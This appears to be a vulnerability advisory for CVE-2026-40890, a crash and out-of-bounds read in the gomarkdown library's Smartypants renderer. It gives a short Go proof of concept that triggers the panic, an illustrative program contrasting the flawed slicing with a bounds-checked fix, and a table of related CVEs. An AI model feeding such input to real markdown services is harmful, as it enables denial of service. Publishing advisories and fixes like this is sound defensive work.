CVE-2026-40890
MinimOS vulnerability analysis and mitigation

Summary

Processing a malformed input that contains a < character with no > character anywhere in the remaining text with a SmartypantsRenderer leads to an out-of-bounds read or a panic.

Details

The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text:

https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376

If the length of the input slice is lower than its capacity, the out-of-range slice succeeds and one byte beyond the end of the input is read. If the length equals the capacity, the slice operation panics.

PoC

package main

import (
	"bytes"
	"fmt"

	"github.com/gomarkdown/markdown/html"
)

func main() {
	// A '<' with no '>' anywhere after it; len and cap are printed so the
	// panic case (len == cap) can be confirmed.
	src := []byte("<a")
	fmt.Printf("Input: %q  (len=%d, cap=%d)\n", src, len(src), cap(src))
	var buf bytes.Buffer
	sp := html.NewSmartypantsRenderer(html.Smartypants)
	sp.Process(&buf, src) // panics: slice bounds out of range
	fmt.Printf("Output: %q\n", buf.String())
}
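The slicing pattern the Details section describes, side by side with a bounds-checked replacement, as an added example in Go. This is constructed illustration code written for this page, not the library's smartLeftAngle() or any other gomarkdown code: the function names leftAngleUnchecked and leftAngleChecked, the return convention (bytes written) and the sample inputs are assumptions made here. It shows both outcomes the advisory names, the extra byte read when the input has spare capacity and the panic when len equals cap, and the hardened form that never depends on cap(text).

```go
package main

import (
	"bytes"
	"fmt"
)

// leftAngleUnchecked follows the pattern the advisory describes (constructed
// illustration, not the library's code): scan forward for '>' and emit
// text[:i+1]. If no '>' exists, the loop stops at i == len(text) and the
// slice text[:i+1] reaches one byte past the length. Go allows a slice to
// extend up to cap(text), so the result depends on spare capacity:
//   - len < cap: one byte of the backing array beyond the input is read
//   - len == cap: the slice expression panics
// The panic is recovered only so the caller can observe it. Returns the
// number of bytes written and a non-nil error when a panic occurred.
func leftAngleUnchecked(out *bytes.Buffer, text []byte) (n int, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("recovered: %v", r)
		}
	}()
	i := 0
	for i < len(text) && text[i] != '>' {
		i++
	}
	out.Write(text[:i+1]) // out of range when i == len(text)
	return i + 1, nil
}

// leftAngleChecked is the bounds-checked form: when no '>' follows, only the
// bytes that actually exist are written and the caller learns how many were
// consumed, so the slice never reads past len(text).
func leftAngleChecked(out *bytes.Buffer, text []byte) int {
	i := bytes.IndexByte(text, '>')
	if i < 0 {
		out.Write(text)
		return len(text)
	}
	out.Write(text[:i+1])
	return i + 1
}

// demo runs both variants over constructed inputs (hypothetical, not taken
// from a real document) and returns one trace line per run.
func demo() []string {
	// Backing array has two spare bytes after the input; len=2, cap=4.
	loose := []byte{'<', 'a', 'X', 'Y'}[:2]
	// Exactly-sized copy; len=2, cap=2.
	tight := make([]byte, 2)
	copy(tight, "<a")
	// Well-formed tag for comparison.
	closed := []byte("<b>c")

	var lines []string
	for _, in := range [][]byte{loose, tight, closed} {
		var out bytes.Buffer
		n, err := leftAngleUnchecked(&out, in)
		lines = append(lines, fmt.Sprintf("unchecked %q (len=%d cap=%d): wrote %d %q err=%v",
			in, len(in), cap(in), n, out.String(), err))
		out.Reset()
		n = leftAngleChecked(&out, in)
		lines = append(lines, fmt.Sprintf("checked   %q: wrote %d %q", in, n, out.String()))
	}
	return lines
}

func main() {
	for _, l := range demo() {
		fmt.Println(l)
	}
}
```

Running main prints the three cases: the loose input yields "<aX" (the byte X was never part of the input), the tight input yields a recovered slice-bounds panic, and the closed tag behaves identically in both variants. The inputs are built with explicit capacities rather than relying on how a []byte(string) conversion is allocated, so the two outcomes are reproducible.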

Impact

This vulnerability will lead to a Denial of Service / panic on the processing service. -- The Datadog Security Team


Source: NVD

Related MinimOS vulnerabilities:

CVE ID           Severity  Score  Technologies  Component name                  CISA KEV exploit  Has fix  Published date
CVE-2026-34457   CRITICAL  9.1    MinimOS       oauth2-proxy                    No                Yes      Apr 14, 2026
CVE-2026-40890   HIGH      7.5    MinimOS       github.com/gomarkdown/markdown  No                Yes      Apr 14, 2026
CVE-2026-39984   MEDIUM    5.5    MinimOS       cosign                          No                Yes      Apr 15, 2026
CVE-2026-40179   MEDIUM    5.3    MinIO         certificate-transparency-fips   No                Yes      Apr 15, 2026
CVE-2026-34454   LOW       3.5    MinimOS       oauth2-proxy                    No                Yes      Apr 14, 2026
